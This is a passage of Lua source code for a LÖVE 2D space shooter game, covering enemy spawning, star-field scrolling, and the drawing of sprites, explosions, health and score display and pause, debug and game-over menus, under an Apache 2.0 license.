local rand_y = util.weighted_random(30, 470, enemies.weight_point)
spawn.enemy("standard", 31, 31, rand_x, rand_y, "random", "random", 100, 1)
enemies.spawn_timer = enemies.spawn_latch
if enemies.spawn_latch > 0.4 then
enemies.spawn_latch = enemies.spawn_latch - (dt * 4)
end
enemies.weight_wait = enemies.weight_wait - dt
if enemies.weight_wait <= 0 then
enemies.weight_point = love.math.random(30, 470)
end
end
if enemies.attack_timer > 0 then
enemies.attack_timer = enemies.attack_timer - dt
elseif enemies.attack_timer <= 0 and #enemies.basic.locations > 0 then
local rand_enemy = math.floor(love.math.random(1, #enemies.basic.locations))
if enemies.basic.locations[rand_enemy].x > game_status.threshhold then
-- make a random enemy attack if it's not too close to the player
table.insert(enemies.basic.projectiles.locations, {
x = enemies.basic.locations[rand_enemy].x - enemies.basic.projectiles.width,
y = enemies.basic.locations[rand_enemy].y
})
end
enemies.attack_timer = enemies.attack_latch
if enemies.attack_latch > 0.175 then
enemies.attack_latch = enemies.attack_latch - (dt * 2.75)
end
end
-- spawn stars
map.stars.near_stars:spawn_stars(1, 5)
map.stars.far_stars:spawn_stars(1, 3)
for type_index, selected_type in pairs(map.stars) do
local all_stale = true
for group_index, selected_group in pairs(selected_type.groups) do
-- iterate over groups of stars
for star_index, selected_star in pairs(selected_group.locations) do
-- move the stars in this group
selected_star.x = selected_star.x - selected_type.speed
selected_group.sprite_batch:set(selected_star.index, selected_type.quad, selected_star.x, selected_star.y)
if selected_group.sprite_batch:getCount() > 950 then
-- this group is full, stop adding to it
selected_group.stale = true
elseif selected_group.sprite_batch:getCount() <= 950 then
all_stale = false
end
if selected_star.x < 0 then
-- the stars in this group are off the screen, mark it for deletion
selected_group.alive = false
elseif selected_star.x >= 0 then
selected_group.alive = true
end
end
end
if all_stale then
-- create new star groups as all existing groups are full
selected_type:spawn_group()
end
end
for type_index, selected_type in pairs(map.stars) do
for group_index, selected_group in pairs(selected_type.groups) do
if selected_group.alive == false then
-- delete invisible star groups
selected_type[group_index] = nil
end
end
end
end
end -- love.update
function love.draw()
-- draw the background
for type_index, selected_type in pairs(map.stars) do
for group_index, selected_group in pairs(selected_type.groups) do
love.graphics.draw(selected_group.sprite_batch)
end
end
-- manage stun flickering
if player.hurt then
if player.flicker_timer <= 0 then
player.flicker_timer = player.flicker_max
elseif player.flicker_timer > player.flicker_max / 2 then
player.flicker_timer = player.flicker_timer - love.timer.getDelta()
love.graphics.setColor(255, 255, 255, 255)
elseif player.flicker_timer <= player.flicker_max / 2 then
-- make the player sprite invisible briefly
player.flicker_timer = player.flicker_timer - love.timer.getDelta()
love.graphics.setColor(255, 255, 255, 0)
end
end
-- draw the player
if player.form == "small" then
love.graphics.draw(player.appearance.small_sprite, player.x, player.y)
elseif player.form == "medium" then
love.graphics.draw(player.appearance.medium_sprite, player.x, player.y)
elseif player.form == "large" then
love.graphics.draw(player.appearance.large_sprite, player.x, player.y)
end
love.graphics.setColor(255, 255, 255, 255)
-- draw enemies
for enemy_index, selected_enemy in pairs(enemies.basic.locations) do
love.graphics.draw(enemies.basic.sprite, selected_enemy.x, selected_enemy.y)
end
-- draw projectiles
for projectile_index, selected_projectile in pairs(enemies.basic.projectiles.locations) do
love.graphics.draw(enemies.basic.projectiles.sprite, selected_projectile.x, selected_projectile.y)
end
for projectile_index, selected_projectile in pairs(player.small_projectiles) do
love.graphics.draw(player.small_projectile_sprite, selected_projectile.x, selected_projectile.y)
end
for projectile_index, selected_projectile in pairs(player.large_projectiles) do
love.graphics.draw(player.large_projectile_sprite, selected_projectile.x, selected_projectile.y)
end
-- show explosions
love.graphics.setColor(4, 16, 8)
for explosion_index, selected_explosion in pairs(map.explosions) do
love.graphics.circle("fill", selected_explosion.x, selected_explosion.y, selected_explosion.size)
love.graphics.circle("line", selected_explosion.x, selected_explosion.y, selected_explosion.first_ring_size)
love.graphics.circle("line", selected_explosion.x, selected_explosion.y, selected_explosion.second_ring_size)
end
love.graphics.setColor(255, 255, 255)
-- draw UI
love.graphics.setFont(game_status.interface_font)
love.graphics.setColor(32, 224, 16)
local hearts = ""
if player.health == 3 then
hearts = "❤︎❤︎❤︎"
elseif player.health == 2 then
hearts = "❤︎❤︎ "
elseif player.health == 1 then
hearts = "❤︎ "
elseif player.health == 0 then
hearts = " "
end
love.graphics.printf("HEALTH: " .. hearts .. " LIVES: " .. tostring(player.lives), 0, 12, love.graphics.getWidth(), "center")
love.graphics.printf("SCORE: " .. tostring(game_status.score) .. " HIGH SCORE: " .. tostring(game_status.high_score), 0, 26, love.graphics.getWidth(), "center")
love.graphics.setFont(game_status.menu_font)
if game_status.menu == "pause" then
-- draw pause UI
love.graphics.setColor(4, 16, 8)
love.graphics.rectangle("fill", love.graphics.getWidth() * 3/8, 175, love.graphics.getWidth() / 4, 150)
love.graphics.setColor(32, 224, 16)
love.graphics.printf("PAUSE", 0, 240, love.graphics.getWidth(), "center")
love.graphics.printf("X TO QUIT", 0, 264, love.graphics.getWidth(), "center")
elseif game_status.menu == "quit_check" then
love.graphics.setColor(4, 16, 8)
love.graphics.rectangle("fill", love.graphics.getWidth() * 3/8, 175, love.graphics.getWidth() / 4, 150)
love.graphics.setColor(32, 224, 16)
love.graphics.printf("REALLY QUIT?", 0, 240, love.graphics.getWidth(), "center")
love.graphics.printf("X TO QUIT", 0, 264, love.graphics.getWidth(), "center")
elseif game_status.menu == "debug" then
love.graphics.setColor(4, 16, 8)
love.graphics.rectangle("fill", love.graphics.getWidth() * 3/8, 175, love.graphics.getWidth() / 4, 150)
love.graphics.setColor(32, 224, 16)
love.graphics.printf("DEBUG", 0, 240, love.graphics.getWidth(), "center")
love.graphics.printf("kill Player - take Health - Give health - kill Enemies - Full health - resurrecT player - console Debug", love.graphics.getWidth() * 3/8, 264, love.graphics.getWidth() / 4, "center")
elseif game_status.menu == "game_over" then
-- draw pause UI
love.graphics.setColor(4, 16, 8)
love.graphics.rectangle("fill", love.graphics.getWidth() * 3/8, 175, love.graphics.getWidth() / 4, 150)
love.graphics.setColor(32, 224, 16)
love.graphics.printf("GAME OVER", 0, 240, love.graphics.getWidth(), "center")
end
end -- love.draw
-- this code copyright 2020 by GV (WPA) and licensed only under Apache License Version 2.0
-- cf https://www.apache.org/licenses/LICENSE-2.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.